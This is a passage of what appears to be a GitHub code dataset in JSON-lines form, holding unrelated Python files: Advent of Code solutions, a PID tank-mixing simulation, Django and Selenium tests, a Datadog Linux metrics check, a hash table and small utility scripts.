int(input('Enter your choice over there : '))\n if choice == 1:\n if not myList:\n print('Empty List.\\n')\n input('touch any key to return to the menu')\n else:\n for element in myList:\n print(f'*{element}\\n')\n input('touch any key to return to the menu')\n\n elif choice == 2:\n if not myList:\n newElement = input('Enter the first element to add : ')\n myList.append(newElement)\n print('Well Done\\n')\n input('touch any key to return to the menu')\n else:\n newElement = input('Enter the element to add : ')\n myList.append(newElement)\n print('Well Done\\n')\n input('touch any key to return to the menu')\n\n elif choice == 3:\n if not myList:\n print('This list is empty. We gonna push your element to the first position')\n newElement = input('Enter the first element to add : ')\n myList.append(newElement)\n print('Well Done\\n')\n input('touch any key to return to the menu')\n else:\n newElement = input('Enter the element to add : ')\n indexOfElement = int(input('At which position you want to push it : '))\n insertElement(myList,indexOfElement,newElement)\n print('Well done')\n input('touch any key to return to the menu')\n \n elif choice == 4:\n if myList:\n print(f'You want to delete. Are you really sure?')\n while True:\n agreement = input('y for yes and n for no : ')\n if agreement== 'y' or agreement =='yes':\n myList.pop()\n print('Successfully removed')\n break\n elif agreement == 'n' or agreement == 'no':\n print('The element will not be removed')\n break\n else:\n print('Your list is empty. 
Nothing to remove') \n input('touch any key to return to the menu')\n elif choice == 5:\n if myList != []:\n myList.reverse()\n print('Now the order of your list has changed') \n\n elif choice == 6:\n if myList: \n myList.clear()\n print('Successfully clean up')\n input('touch any key to return to the menu')\n\n elif choice == 7:\n break\n else:\n print('Your choice should be between 1 and 7')","repo_name":"Sylva-Egb/learning_python","sub_path":"listScripting.py","file_name":"listScripting.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42352796052","text":"# https://pypi.org/project/anytree/\n\nclass Command:\n def __init__(self, string_list: list):\n self.type = string_list[1]\n self.argument = [x.strip() for x in string_list[2:]]\nclass Directory:\n def __init__(self, name:str, parent_dir):\n self.name = name\n self.children = {}\n self.size = 0\n self.parent = parent_dir\n\n def add_child(self, child, child_name):\n self.children.update({child_name: child})\n \n def update_size(self, added_size):\n self.size+=added_size\n if self.parent != None:\n self.parent.update_size(added_size)\n \n def print_dir(self, level):\n print(\"\\t\"*level, \"-\", self.name, \"(dir\", self.size, \")\")\n level +=1\n for k in self.children:\n child = self.children[k]\n if isinstance(child, File):\n print(\"\\t\"*(level), \"-\", child.name, \"(file \", child.size, \")\")\n else:\n child.print_dir(level)\n \n def get_dir_less_than_size(self, size, dir_list):\n for k in self.children:\n child = self.children[k]\n if isinstance(child, Directory):\n if child.size <= size:\n dir_list.append(child.size)\n child.get_dir_less_than_size(size, dir_list)\n \n\nclass File:\n def __init__(self, name:str, size:int, parent: Directory):\n self.name = name\n self.size = int(size.strip())\n self.parent = parent\n self.update_size(self.size)\n\n def update_size(self, size):\n self.parent.update_size(size) \n\nclass Filesystem:\n def add_root(self, root:Directory):\n self.root = root\n \n def print_fs(self):\n self.root.print_dir(0)\n \n def get_dir_less_than_size(self, size):\n dir_list=[]\n self.root.get_dir_less_than_size(size, dir_list)\n return dir_list\n\nfs = Filesystem()\ndef day7a(filepath):\n cursor_position = None\n with open(filepath) as f:\n for line in f:\n if cursor_position != None:\n print(cursor_position.name)\n string_list = line.split(' ')\n string_list = [x.strip() for x in string_list]\n if string_list[0]=='$':\n cmd = Command(string_list=string_list)\n print(\"line is command \", cmd.type)\n if cmd.type == \"cd\":\n dir_name = cmd.argument[0]\n print(dir_name)\n if dir_name == \"/\":\n root = Directory(\"root\", None)\n fs.add_root(root)\n cursor_position = root\n elif dir_name == \"..\":\n cursor_position = cursor_position.parent\n else:\n cursor_position = cursor_position.children[dir_name]\n else:\n if string_list[0] == \"dir\":\n dir_name = string_list[1]\n new_dir = Directory(dir_name, cursor_position)\n cursor_position.add_child(new_dir, dir_name)\n else:\n file_name = string_list[1]\n file_size = string_list[0]\n new_file = File(file_name, file_size, cursor_position)\n cursor_position.add_child(new_file, file_name)\n\n print(\"line is list\")\n fs.print_fs()\n list_dir = fs.get_dir_less_than_size(100000)\n return sum(list_dir)\n\ndef day7b(filepath):\n diskspace = 70000000\n update_space = 30000000\n list_dir = fs.get_dir_less_than_size(diskspace)\n occupied_space = fs.root.size\n free_space 
= diskspace-occupied_space\n space_to_be_freed = update_space-free_space\n suitable_dirs = [x for x in list_dir if x>= space_to_be_freed]\n print(\"occupied: \", occupied_space, \"free space\", free_space, \"to be freed\", space_to_be_freed)\n suitable_dirs.sort()\n print(suitable_dirs)\n return suitable_dirs[0]\n\nprint(day7a('day7_veronica.txt')) \nprint(day7b('day7_veronica.txt'))\n","repo_name":"Berenix90V/AdventOfCode2022","sub_path":"src/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7213826229","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 26 20:09:19 2020\n\n@author: wanxiangfan\n\"\"\"\n\nimport numpy as np#import statsmodels as sm\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n#dx005mm=np.loadtxt(\"dx=0.05mm.txt\") \nR=10**7\ndx02mm=np.loadtxt(\"dx=0.2mm.txt\")\ndx03mm=np.loadtxt(\"dx=0.3mm.txt\")\ndx04mm=np.loadtxt(\"dx=0.4mm.txt\")\ndx05mm=np.loadtxt(\"dx=0.5mm.txt\")\n#print(\"0.05 :\",sum(dx005mm))\n#print(dx05mm)\nprint(\"0.2 :\",sum(dx02mm))\nprint(\"0.3 :\",sum(dx03mm))\nprint(\"0.4 :\",sum(dx04mm))\nprint(\"0.5 :\",sum(dx05mm))\n#import statsmodels\n#print(statsmodels.__version__) \ndef polynomial1(x,a,b):\n return a*x**b\ndef ploynomial2(x,a):\n return a*x**4 \n \ndef fit_polynomial1(x,y,yerr): #fit N_3e -- dx space resolution\n #xerr = np.random.random_sample(10)\n fig, ax = plt.subplots()\n \n ax.errorbar(x, y,\n yerr=yerr,\n fmt='-o')\n \n ax.set_xlabel('dx (mm)')\n ax.set_ylabel('prob')\n ax.set_title('prob--space resolution')\n plt.show()\n \n plt.plot(x, y, 'b-', label='data') \n popt, pcov = curve_fit(polynomial1, x, y)\n print(popt)\n plt.plot(x, polynomial1(x, *popt), 'r-',\n label='fit: a=%f ,b=%f' % tuple(popt))#,b=%5.3f, c=%5.3f, d=%5.3f\n plt.xlabel('dx (mm)')\n plt.ylabel('prob')\n plt.legend()\n plt.show()\ndef fit_polynomial2(x,y,yerr): #fit N_3e -- dx space resolution\n #xerr = np.random.random_sample(10)\n fig, ax = plt.subplots()\n \n ax.errorbar(x, y,\n yerr=yerr,\n fmt='-o')\n \n ax.set_xlabel('dx (mm)')\n ax.set_ylabel('prob')\n ax.set_title('prob--space resolution')\n plt.show()\n \n plt.plot(x, y, 'b-', label='data') \n popt, pcov = curve_fit(ploynomial2, x, y)\n print(popt)\n plt.plot(x, ploynomial2(x, *popt), 'r-',\n label='fit: a=%f' % tuple(popt))#,b=%5.3f, c=%5.3f, d=%5.3f\n plt.xlabel('dx (mm)')\n plt.ylabel('prob')\n plt.legend()\n plt.show()\n \n\ndef CI(x): # confidence interval\n count = sum(x)\n #number of successes, can be pandas Series or DataFrame\n nobs= len(x)*R\n #total number of trials\n\n #alphafloat in (0, 1) significance level, default 0.05\n\n #method{'normal', 'agresti_coull', 'beta', 'wilson', 'binom_test'}\n #default: 'normal' method to use for confidence interval, currently available methods :\n ci_low, ci_upp = sm.stats.proportion_confint(count, nobs, alpha=0.95, method='wilson')\n #p = sum(x)/len(x)/R\n p = (ci_low+ci_upp)/2\n p_err = abs(ci_low-ci_upp)/2\n return [p,p_err]#, ci_low, ci_upp\nL = [dx02mm,dx03mm,dx04mm,dx05mm]\np_with_err= np.array([CI(L[i]) for i in range(len(L))])\nprint(np.transpose(p_with_err)[0])\n#for i in L: \n #p, p_err = CI(i)\n # print('p', 'ci_low', 'ci_upp')\n # print(p, ci_low, ci_upp)\n #x=np.array([0.2,0.3,0.4,0.5])\n #y=np.array([bernoulli(dx02mm),bernoulli(dx03mm),bernoulli(dx04mm),bernoulli(dx05mm)])\n #print (y)\n\n\n\n# test data and error\nx = 
np.array([0.2,0.3,0.4,0.5])\ny,y_err = np.array(np.transpose(p_with_err)[0]),np.array(np.transpose(p_with_err)[1])\n#fit_polynomial1(x=x,y=y,yerr=y_err)\nfit_polynomial1(x=x,y=y,yerr=y_err)","repo_name":"Fanwanxiang/mu3e_project","sub_path":"cone_simulation/original_file_simulate_coincidence_at_diff_dx/load_txt_analysis_prob_vs_dx.py","file_name":"load_txt_analysis_prob_vs_dx.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26042935915","text":"\"\"\"\nGeneral idea: solve recursively from n = 0 to N where N = number of iterations derived from time / Tp\nIf spare time is found, try going from N to 0 to see how much memory its gonna hog\nStarting conditions (can be changed later):\n\nV(0)=V0\nV(n+1)=(Qd1(n)+Qd2(n)-Q0(n))*Tp+V(n)\nc(0)=c0\nc(n+1)=(Qd1(n)*(cd1(n)-c(n))+Qd2(n)*(cd2(n)-c(n)))*Tp/V(n)+c(n)\n\nwhere:\nc = concentration of ingredient\nQd = inflow of # ingredient\nQo = outflow of solution\nV = volume of solution\n\"\"\"\n\n\ndef convertToPerUnitTime(arg):\n # we have everything in something per minute, here we convert to per iteration\n return arg / 60\n\n\ndef createKeyMomentsTable():\n # tmp[[n,c,V],...]\n tmp = [[0, c[0], V[0]]]\n for n in range(len(c)):\n if n == 0:\n continue\n deltaC = c[n] - c[n - 1]\n deltaV = V[n] - V[n - 1]\n threshC = 0.01\n threshV = 0.12\n if deltaV >= threshV or deltaC >= threshC:\n tmp.append([n, c[n], V[n]])\n return tmp\n\n\nfrom tools import PIDController as PID_Controller\n\n# main start\n\n# constraints\nvMax = 2000 # maximum length of container in meters\ncMax = 1 # maximum concentration, if c>cMax, then sth is wrong\n\n# parameters\n\n# starting volume (m^3)\nV = [10]\n# starting concentration\nc = [0.1]\n# target concentration\ntarget_c = 0.25\n# sampling time/step time (in seconds)\nTp = 0.5\n# concentration of ingredient 1\ncd1 = [0.5]\n# concentration of ingredient 2\ncd2 = [0.2]\n# simulationLength (in hours)\nsimulationLength = 1\n# inflow of first ingredient, for now constant (m^3/m)\nQd1 = [convertToPerUnitTime(5)]\n# inflow of second ingredient, for now constant (m^3/m)\nQd2 = [convertToPerUnitTime(3)]\n# outflow, I thought it'd be Beta*sqrt(h(n)) but apparently it's const (m^3/m)\nQo = [convertToPerUnitTime(5)]\n\n# additional variables\ne1 = [target_c - c[0]]\nde1 = [0]\ndde1 = [0]\nu1 = [0]\ne2 = [0]\nde2 = [0]\ndde2 = [0]\nu2 = [0]\nu2_unconstrained = [0]\n\n# input cap\nmaxInflow = convertToPerUnitTime(10)\n\n# PID controller data\nfPID = open(\"PIDFillingSettingsConc\", \"r\")\nPID_conc = PID_Controller.PIDController(float(fPID.readline()), float(fPID.readline()),\n float(fPID.readline()),\n Tp)\n\nfPID = open(\"PIDFillingSettingsFlow\", \"r\")\nPID_flow = PID_Controller.PIDController(float(fPID.readline()), float(fPID.readline()), float(fPID.readline()),\n Tp)\n\nfConcDiag = open(\"PID_conc_diagnostic.txt\", \"w\")\nfConcDiag.write(\"e\\tde\\tdde\\tu1\\n\")\n\nfVolDiag = open(\"PID_vol_diagnostic.txt\", \"w\")\nfVolDiag.write(\"e\\tde\\tdde\\tu2\\n\")\n\n# 1: calculate number of iterations\niterations = int(3600 * simulationLength / Tp)\n\nf = open(\"ctrl_mix.txt\", \"w\")\n# f.write(\"number of iterations: \")\n# f.write(str(iterations))\n# f.write(\"\\n\")\nf.write(\"n\\t\")\nf.write(\"water volume V\\t\")\nf.write(\"water input Qd1\\t\")\nf.write(\"water input Qd2\\t\")\nf.write(\"water output Qo\\t\")\nf.write(\"concentration c\\t\")\nf.write(\"concentration cd1\\t\")\nf.write(\"concentration 
cd2\\n\")\n\nf.write(\"0\\t\")\nf.write(str(V[0]) + \"\\t\")\nf.write(str(Qd1[0]) + \"\\t\")\nf.write(str(Qd2[0]) + \"\\t\")\nf.write(str(Qo[0]) + \"\\t\")\nf.write(str(c[0]) + \"\\t\")\nf.write(str(cd1[0]) + \"\\t\")\nf.write(str(cd2[0]) + \"\\n\")\n\n# 2:loop\nfor n in range(iterations + 1):\n # skip step n = 0\n if n == 0:\n continue\n e1.append(target_c - c[n - 1])\n de1.append(e1[n - 1] - e1[n - 2])\n\n if n < 2:\n dde1.append(de1[n])\n else:\n dde1.append(e1[n - 1] - 2 * e1[n - 2] + e1[n - 3])\n\n tmp_u1 = PID_conc.calc_delta_u(de1[n], e1[n], dde1[n]) + u1[n - 1]\n #if tmp_u1 < 0:\n #tmp_u1 = 0\n u1.append(tmp_u1)\n # u1.append(PID_conc.calc_delta_u(de1[n], e1[n], dde1[n]))\n # u1.append(PID_conc.calc_delta_u(de1[n], 0, dde1[n]))\n # u1[n] += u1[n - 1]\n\n # u1 is x2, x2 - y2 = e2, y2 is V[0]\n e2.append(u1[n] - u1[n - 1])\n de2.append(e2[n] - e2[n - 1])\n\n if n < 2:\n dde2.append(de2[n])\n else:\n dde2.append(e2[n] - 2 * e2[n - 1] + e2[n - 2])\n\n tmp_u2 = PID_flow.calc_delta_u(de2[n], e2[n], dde2[n]) + u2[n - 1]\n if tmp_u2 < 0:\n tmp_u2 = 0\n u2.append(tmp_u2)\n \"\"\"\n u2.append(PID_flow.calc_delta_u(de2[n], e2[n], dde2[n]))\n u2[n] += u2[n - 1]\n \"\"\"\n\n u2_unconstrained.append(u2[n])\n if u2[n] > maxInflow:\n u2[n] = maxInflow\n if u2[n] <= 0:\n u2[n] = 0\n Qd1.append(u2[n])\n # Qo.append(Qd1[n] + Qd2[0])\n print(\"Qd1: \", Qd1[n])\n # all of unchanging constants have been swapped for direct indexes\n # modified model\n Qo[0] = Qd1[n] + Qd2[0]\n VNext = (Qd1[n] + Qd2[0] - Qo[0]) * Tp + V[n - 1]\n if VNext > vMax:\n print('Container overflowed! Happened at iteration = ', n)\n f.write(\"Error, overfilled!\\n\")\n f.close()\n break\n if VNext < 0:\n print('Container empty! Happened at iteration = ', n)\n f.write(\"Error, empty!\\n\")\n f.close()\n break\n V.append(VNext)\n aa = Qd1[n - 1] * (cd1[0] - c[n - 1])\n bb = Qd2[0] * (cd2[0] - c[n - 1])\n delta = (aa + bb) * Tp / V[n - 1]\n cNext = delta + c[n - 1]\n if cNext > cMax:\n print('Concentration too high!')\n f.write(\"Error, concentration above 100%!\\n\")\n f.close()\n break\n c.append(cNext)\n f.write(str(n) + \"\\t\")\n f.write(str(VNext) + \"\\t\")\n f.write(str(Qd1[n]) + \"\\t\")\n f.write(str(Qd2[0]) + \"\\t\")\n f.write(str(Qo[0]) + \"\\t\")\n f.write(str(cNext) + \"\\t\")\n f.write(str(cd1[0]) + \"\\t\")\n f.write(str(cd2[0]) + \"\\n\")\n\n sentence = \" \".join([str(e1[n]), \"\\t\", str(de1[n]), \"\\t\", str(dde1[n]), \"\\t\", str(u1[n]), \"\\n\"])\n fConcDiag.write(sentence)\n sentence = \" \".join([str(e2[n]), \"\\t\", str(de2[n]), \"\\t\", str(dde2[n]), \"\\t\", str(u2[n]), \"\\n\"])\n fVolDiag.write(sentence)\n\nfinalScore = createKeyMomentsTable()\nf.close()\n","repo_name":"HubNeu/PIDWithMachineLearning","sub_path":"programs/controlled_mixing_old.py","file_name":"controlled_mixing_old.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"43001284951","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom posts.models import Group, Post, Comment\n\nUser = get_user_model()\n\n\nclass PostModelTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='auth')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='Тестовый слаг',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Тестовая пост',\n )\n\n cls.test_model = (\n (cls.group, 
cls.group.title),\n (cls.post, cls.post.text[:15]),\n )\n cls.comment = Comment.objects.create(\n post=cls.post,\n author=cls.post.author,\n text='Новая запись!',\n )\n\n def test_models_str_return(self):\n \"\"\"Check that the models' __str__ method works.\"\"\"\n for model_name, str_value in PostModelTest.test_model:\n with self.subTest(model_name=model_name):\n self.assertEqual(str(model_name), str_value)\n\n def test_title_label_post(self):\n \"\"\"Check the verbose_name set when creating a post.\"\"\"\n task = PostModelTest.post\n verbose = task._meta.get_field('group').verbose_name\n self.assertEqual(verbose, 'Группа')\n\n def test_title_help_text_post(self):\n \"\"\"Check the help_text shown when choosing a group.\"\"\"\n task = PostModelTest.post\n help_texts = task._meta.get_field('group').help_text\n self.assertEqual(help_texts, 'Выберите название группы')\n\n def test_title_label_group(self):\n \"\"\"Check that verbose_name is present when creating a group.\"\"\"\n task = PostModelTest.group\n verbose = task._meta.get_field('title').verbose_name\n self.assertEqual(verbose, 'Заголовок группы')\n\n def test_title_help_text_group(self):\n \"\"\"Check that help_text is present when creating a group.\"\"\"\n task = PostModelTest.group\n help_texts = task._meta.get_field('title').help_text\n self.assertEqual(help_texts, 'Укажите заголовок группы')\n\n def test_comment_author_help_text(self):\n \"\"\"Check that help_text (the hint) is present on the author field.\"\"\"\n task = PostModelTest.comment\n verbose = task._meta.get_field('author').help_text\n self.assertEqual(verbose, 'Автор отображается на сайте')\n\n def test_comment_post_help_text(self):\n \"\"\"Check that help_text (the hint) is present on the post field.\"\"\"\n task = PostModelTest.comment\n verbose = task._meta.get_field('post').help_text\n self.assertEqual(verbose, 'Под каким постом оставлен комментарий')\n\n def test_comment_post_verbose_name(self):\n \"\"\"Check that verbose_name is present on the post field.\"\"\"\n task = PostModelTest.comment\n verbose = task._meta.get_field('post').verbose_name\n self.assertEqual(verbose, 'Пост')\n\n def test_comment_author_verbose_name(self):\n \"\"\"Check that verbose_name is present on the author field.\"\"\"\n task = PostModelTest.comment\n verbose = task._meta.get_field('author').verbose_name\n self.assertEqual(verbose, 'Автор комментария')\n","repo_name":"RinatMukhaev/hw05_final","sub_path":"yatube/posts/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7761053005","text":"import pytest\nimport time\n\nbase_url = 'https://dev.pbees.party'\nuser_details = {\"email\": \"psureshkumarece@gmail.com\", \"password\": \"password\"}\n\n# base_url = 'https://storyweaver.org.in/'\n\ndef test_guest_create(setUp):\n browser = setUp\n basePage = browser.base_page()\n homePage = browser.home_page()\n basePage.navigate_to_url(base_url)\n homePage.click_create_link()\n assert homePage.is_login_poup() == True\n\ndef test_create_story_without_images(setUp):\n browser = setUp\n basePage = browser.base_page()\n loginPage = browser.login_page()\n homePage = browser.home_page()\n createPage = browser.create_page()\n basePage.navigate_to_url(base_url)\n time.sleep(5)\n loginPage.login_with(user_details)\n basePage.wait_for_page_to_load()\n time.sleep(2)\n homePage.click_create_link()\n time.sleep(2)\n assert createPage.is_create_page() == True\n new_book_data = {'title': 'suresh'}\n 
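# fill in a title only and publish without attaching any images; the form is expected to fail validation\n 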
createPage.fill_new_book_popup(new_book_data)\n time.sleep(5)\n createPage.click_publish()\n time.sleep(5)\n error_flag = createPage.is_validation_error()\n assert error_flag == True","repo_name":"sureshpathipati/pyauto","sub_path":"create_story_test.py","file_name":"create_story_test.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11074791375","text":"# (C) Cory Watson 2016\n# (C) Datadog, Inc. 2016-present\n# All rights reserved\n# Licensed under Simplified BSD License (see LICENSE)\n\nfrom collections import defaultdict\n\nfrom six import iteritems\n\nfrom datadog_checks.base import AgentCheck\nfrom datadog_checks.base.utils.subprocess_output import get_subprocess_output\n\ntry:\n import datadog_agent\nexcept ImportError:\n from datadog_checks.base.stubs import datadog_agent\n\n\nPROCESS_STATES = {\n 'D': 'uninterruptible',\n 'R': 'runnable',\n 'S': 'sleeping',\n 'T': 'stopped',\n 'W': 'paging',\n 'X': 'dead',\n 'Z': 'zombie',\n}\n\nPROCESS_PRIOS = {'<': 'high', 'N': 'low', 'L': 'locked'}\n\n\nclass MoreUnixCheck(AgentCheck):\n def __init__(self, *args, **kwargs):\n super(MoreUnixCheck, self).__init__(*args, **kwargs)\n self.tags = self.instance.get('tags', [])\n self.set_paths()\n\n def check(self, instance):\n self.get_inode_info()\n self.get_stat_info()\n self.get_entropy_info()\n self.get_process_states()\n if self.instance.get('include_interrupt_metrics', False):\n self.get_interrupts_info()\n\n def set_paths(self):\n proc_location = (datadog_agent.get_config('procfs_path') or '/proc').rstrip('/')\n\n self.proc_path_map = {\n \"inode_info\": \"sys/fs/inode-nr\",\n \"stat_info\": \"stat\",\n \"entropy_info\": \"sys/kernel/random/entropy_avail\",\n \"interrupts_info\": \"interrupts\",\n }\n\n for key, path in iteritems(self.proc_path_map):\n self.proc_path_map[key] = \"{procfs}/{path}\".format(procfs=proc_location, path=path)\n\n def get_inode_info(self):\n with open(self.proc_path_map['inode_info'], 'r') as inode_info:\n inode_stats = inode_info.readline().split()\n self.gauge('system.inodes.total', float(inode_stats[0]), tags=self.tags)\n self.gauge('system.inodes.used', float(inode_stats[1]), tags=self.tags)\n\n def get_stat_info(self):\n with open(self.proc_path_map['stat_info'], 'r') as stat_info:\n lines = [line.strip() for line in stat_info.readlines()]\n for line in lines:\n if line.startswith('ctxt'):\n ctxt_count = float(line.split(' ')[1])\n self.monotonic_count('system.linux.context_switches', ctxt_count, tags=self.tags)\n elif line.startswith('processes'):\n process_count = int(line.split(' ')[1])\n self.monotonic_count('system.linux.processes_created', process_count, tags=self.tags)\n elif line.startswith('intr'):\n interrupts = int(line.split(' ')[1])\n self.monotonic_count('system.linux.interrupts', interrupts, tags=self.tags)\n\n def get_entropy_info(self):\n with open(self.proc_path_map['entropy_info'], 'r') as entropy_info:\n entropy = entropy_info.readline()\n self.gauge('system.entropy.available', float(entropy), tags=self.tags)\n\n def get_process_states(self):\n state_counts = defaultdict(int)\n prio_counts = defaultdict(int)\n ps = get_subprocess_output(['ps', '--no-header', '-eo', 'stat'], self.log)\n for state in ps[0]:\n # Each process state is a flag in a list of characters. 
See ps(1) for details.\n for _ in list(state):\n if state in PROCESS_STATES:\n state_counts[PROCESS_STATES[state]] += 1\n elif state in PROCESS_PRIOS:\n prio_counts[PROCESS_PRIOS[state]] += 1\n\n for state in state_counts:\n state_tags = list(self.tags)\n state_tags.append(\"state:\" + state)\n self.gauge('system.processes.states', float(state_counts[state]), state_tags)\n\n for prio in prio_counts:\n prio_tags = list(self.tags)\n prio_tags.append(\"priority:\" + prio)\n self.gauge('system.processes.priorities', float(prio_counts[prio]), prio_tags)\n\n def get_interrupts_info(self):\n with open(self.proc_path_map['interrupts_info'], 'r') as interrupts_info:\n lines = [line.strip() for line in interrupts_info.readlines()]\n cpu_count = len(lines[0].split())\n for line in lines[1:]:\n parts = line.split()\n irq_id = parts[0].replace(\":\", \"\")\n for cpu_id, part in enumerate(parts[1 : cpu_count + 1]):\n irq_count = int(part)\n tags = self.tags + ['irq:{}'.format(irq_id), 'cpu_id:{}'.format(cpu_id)]\n self.monotonic_count(\"system.linux.irq\", irq_count, tags=tags)\n","repo_name":"DataDog/integrations-core","sub_path":"linux_proc_extras/datadog_checks/linux_proc_extras/linux_proc_extras.py","file_name":"linux_proc_extras.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","stars":820,"dataset":"github-code","pt":"83"} +{"seq_id":"70802222672","text":"# A super simple implementation of a hash table in python\n# Uses list-of-lists approach w/ closed addressing\n\nclass MyHashTable(object):\n\n def __init__(self, table_length: int):\n self.table_length = table_length\n self.table = [[] for i in range(table_length)]\n\n\n # for given key, create a hash code using python's built-in hash()\n # note: this hash code is independent of length of table\n def get_hash_code(self, key) -> int:\n return hash(str(key))\n\n\n # for given hash code, return the corresponding index of the \"table\" list\n def h(self, hash_code) -> int:\n return hash_code % self.table_length\n\n\n # lookup and return the value using the given key\n def get(self, key):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n for t in self.table[index]:\n if t[0] == key:\n return t[1]\n\n return None\n\n\n # check to see if a given key exists in hash table\n def find(self, key):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n for t in self.table[index]:\n if t[0] == key:\n return True\n\n return False\n\n\n # insert a new (key, value) pair into the hash table\n def insert(self, key, value):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n\n # if key already exists in table, error\n for t in self.table[index]:\n assert t[0] != key, \"Key already present in hash table; try update(key, value) instead.\"\n\n self.table[index].append((key, value))\n\n\n # change the value in table of key to given new_\n def update(self, key, new_value):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n\n for t in self.table[index]:\n if t[0] == key:\n self.table[index].remove(t)\n self.table[index].append((key, new_value))\n return\n\n assert False, \"Key not present in hash table; try insert(key, value) instead.\"\n\n\n # remove element with given key from the hash table\n def remove(self, key):\n hash_code = self.get_hash_code(key)\n index = self.h(hash_code)\n for t in self.table[index]:\n if t[0] == key:\n self.table[index].remove(t)\n return\n\n assert False, \"Key not present in hash table; could not delete\"\n\n\n # convert hash 
table to string and return\n    def to_string(self):\n        ht = ''\n        for row in self.table:\n            ht += (str(row) + \"\\n\")\n\n        return ht\n","repo_name":"grahamplace/etudes","sub_path":"python/data_structures/hash_table/hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"16714731454","text":"#!/usr/bin/env python3\n\n\"\"\"\nugh. this has an \"off by one\" error somewhere... the max string value is +/- 1\n\"\"\"\n\nimport collections\nimport copy\nimport fileinput\nimport pprint\nimport re\nimport statistics\nimport sys\nimport typing\n\n\ndef main() -> None:\n    base = None\n    pair_changes: typing.Dict[str, str] = {}\n    for line in fileinput.input():\n        if base is None:\n            base = line.strip()\n            continue\n        if len(line.strip()) == 0:\n            continue\n        words = line.strip().split(\" -> \")\n        lhs = words[0]\n        rhs = lhs[0] + words[1] + lhs[1]\n        pair_changes[lhs] = rhs\n\n    current_pairs: typing.Dict[str, int] = collections.defaultdict(int)\n    for idx, letter in enumerate(base):\n        try:\n            pair = letter + base[idx+1]\n        except IndexError:\n            continue\n        current_pairs[pair] += 1\n    for step in range(40):\n        # print(f\"step {step + 1}\")\n        new_pairs: typing.Dict[str, int] = collections.defaultdict(int)\n        for pair in list(current_pairs):\n            three_letter = pair_changes[pair]\n            new_pairs[three_letter[0:2]] += current_pairs[pair]\n            new_pairs[three_letter[1:3]] += current_pairs[pair]\n        # if step in (0, 1):\n        #     print(f\"base {base}\")\n        #     print(f\"current_pairs {repr(current_pairs)}\")\n        #     print(f\"new_pairs {repr(new_pairs)}\")\n        current_pairs = new_pairs\n\n    counting: typing.Dict[str, int] = collections.defaultdict(int)\n    for pair in current_pairs:\n        counting[pair[0]] += current_pairs[pair]\n    counting[base[-1]] += 1\n\n    max_l = max(counting, key=counting.get)\n    min_l = min(counting, key=counting.get)\n    max_l_val = counting[max_l]\n    min_l_val = counting[min_l]\n    print(f\"max letter {max_l} -> {max_l_val} min letter {min_l} -> {min_l_val} result {max_l_val - min_l_val}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"zapman449/AdventOfCode","sub_path":"2021/day14/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"10024747270","text":"import datetime\nimport csv\nfrom redminelib import Redmine\nfrom redminelib.exceptions import ResourceNotFoundError\n\nredmine = Redmine('https://xxxxxxxxxxxxx', key='xxxxxxxxxxxxxx')\n# enter the API key\n\nissues = redmine.issue.filter(\n    project_id='xx',\n    cf_x='aa|bb',\n    tracker_id='xx'\n)\nfor issue in issues:\n    values = [x['value'] for x in issue.custom_fields if x['id'] == xx]\n    value = values[0] if len(values) else ''\n    print ('%d:%s:%s' % (issue.id, issue.subject, value))\n","repo_name":"beaverjr/til","sub_path":"python/python-rdm-example.py","file_name":"python-rdm-example.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"74310721552","text":"import requests\nimport traceback\nimport pandas as pd\nimport numpy as np\nimport time\nimport os\nfrom update.util.dbConnect import insert_data, exec_query\nfrom datetime import datetime, timedelta\nfrom itertools import groupby\n\n\ndef load_required_df():\n    \"\"\" Extract the dataframes required for the MDD update \"\"\"\n    # fetch the most recent update date\n    mdd_latest_date = exec_query(f'select max(date) from stock_db.d_mdd')
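\n    # exec_query is assumed to return a list of row tuples, hence the [0][0] below unwrapping the single max(date) value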
